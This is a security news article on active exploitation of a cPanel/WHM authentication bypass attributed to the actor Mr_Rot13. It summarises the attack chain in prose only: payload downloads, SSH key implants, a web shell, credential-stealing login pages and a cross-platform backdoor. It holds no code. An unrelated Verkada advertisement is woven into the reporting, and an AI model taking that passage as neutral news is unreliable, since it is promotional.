Researchers Link Active cPanel Attacks to Threat Actor Mr_Rot13
A recently disclosed critical vulnerability affecting cPanel and WebHost Manager (WHM) is now being actively exploited by multiple threat actors, with researchers attributing one of the campaigns to an operator known as Mr_Rot13.
The flaw, tracked as CVE-2026-41940, allows authentication bypass under certain conditions and could give remote attackers elevated access to vulnerable cPanel environments. Security researchers say exploitation activity began surfacing almost immediately after technical details surrounding the flaw became public, adding fresh pressure on organizations to improve visibility across internet-facing infrastructure and administrative systems. The growing focus on centralized security operations and real-time monitoring is also pushing enterprises toward more integrated physical and digital security strategies, with platforms such as Verkada gaining attention for helping security teams unify surveillance, access management, and AI-driven operational visibility through cloud-based deployments. Organizations evaluating modernization initiatives are increasingly looking at resources such as Verkada’s Demo Deck to better understand how unified security environments can reduce investigation time and simplify infrastructure management.
According to findings from QiAnXin XLab, attackers have already used the vulnerability to distribute ransomware-related payloads, cryptocurrency miners, botnet malware, and persistent backdoors.
Researchers said they observed more than 2,000 source IP addresses participating in automated exploitation attempts globally. A large portion of the activity appeared to originate from infrastructure located in Germany, the United States, Brazil, and the Netherlands.
The scale of the scanning suggests the flaw has already been incorporated into broader automated attack activity commonly seen after high-profile infrastructure vulnerabilities are disclosed publicly.
Attack Chain Moves Beyond Initial Server Compromise
During the investigation, XLab researchers identified a shell script that downloads a Go-based payload from an external server using wget or curl utilities.
Attackers Establish Long-Term Access Through SSH and Web Shells
Once executed, the payload implants an SSH public key on the compromised system, allowing attackers to reconnect without relying on the original exploit path. Researchers also found a PHP-based web shell dropped onto infected servers.
The web shell gives attackers the ability to upload files, run remote commands, and move additional payloads onto the environment after initial access has been established.
At another stage of the intrusion, malicious JavaScript was injected into login workflows tied to the compromised cPanel environment. Instead of displaying the normal authentication page, users were shown a modified login interface designed to capture credentials.
Those stolen credentials were then forwarded to an attacker-controlled infrastructure that researchers said had been obscured using ROT13 encoding methods.
Filemanager Malware Expands Control Across Multiple Platforms
The final payload observed in the campaign was a cross-platform backdoor known as Filemanager. According to XLab, the malware can operate across Windows, Linux, and macOS systems.
Researchers said the malware includes remote shell access and file management functionality, giving operators broad visibility and control over compromised environments.
The investigation also found evidence of data collection activity targeting sensitive information stored on infected systems, including SSH-related data, bash history, device details, database credentials, and cPanel valiases.
Parts of the stolen information were reportedly transmitted to a Telegram group associated with a user identified as “0xWR.”
Hosting and Administrative Infrastructure Under Growing Pressure
The incident highlights how heavily exposed administrative environments continue to attract attacker attention, particularly when they are tied to shared hosting, cloud management, or multi-tenant infrastructure.
cPanel remains widely deployed across hosting providers, managed infrastructure environments, and enterprise web operations. Because these systems often manage multiple domains, users, and administrative functions from a single interface, a successful compromise can create wider operational consequences beyond the initially infected server.
For security teams, one of the bigger concerns is the speed at which exploitation activity is now developing after vulnerability disclosure.
In many organizations, externally exposed systems still move through patch validation, operational review, and change-control processes before updates are pushed into production. Attackers increasingly take advantage of that delay by automating reconnaissance and exploit deployment almost immediately after vulnerabilities become public.
Security leaders are also facing increased pressure to improve visibility into externally accessible management systems that may exist across subsidiaries, third-party hosting providers, or older infrastructure environments that are not always included in centralized security monitoring programs.
The campaign tied to CVE-2026-41940 also reflects a larger trend in which attackers are focusing less on individual user endpoints and more on administrative systems capable of opening access into broader infrastructure environments.
Researchers Believe the Operation May Have Been Active for Years
XLab researchers believe the infrastructure linked to Mr_Rot13 may not be new.
Part of this assessment is based on overlaps between domains detected in the present campaign and older malware samples published to VirusTotal in 2022. Researchers discovered that one of the command-and-control domains associated with the operation was registered in October 2020.
They also said the threat actor’s tooling has historically maintained a very low detection rate across security products, making long-term visibility into the operation difficult.
“The detection rate of Mr_Rot13’s related samples and infrastructure across security products has remained extremely low,” XLab researchers said.
For enterprise defenders, the findings reinforce a growing concern surrounding stealth-oriented attacks targeting internet-facing infrastructure, especially platforms tied to identity management, hosting operations, and centralized administrative control.
Research and Intelligence Sources: blog.xlab.qianxin
To participate in our interviews, please write to our CyberTech Media Room at info@intentamplify.com
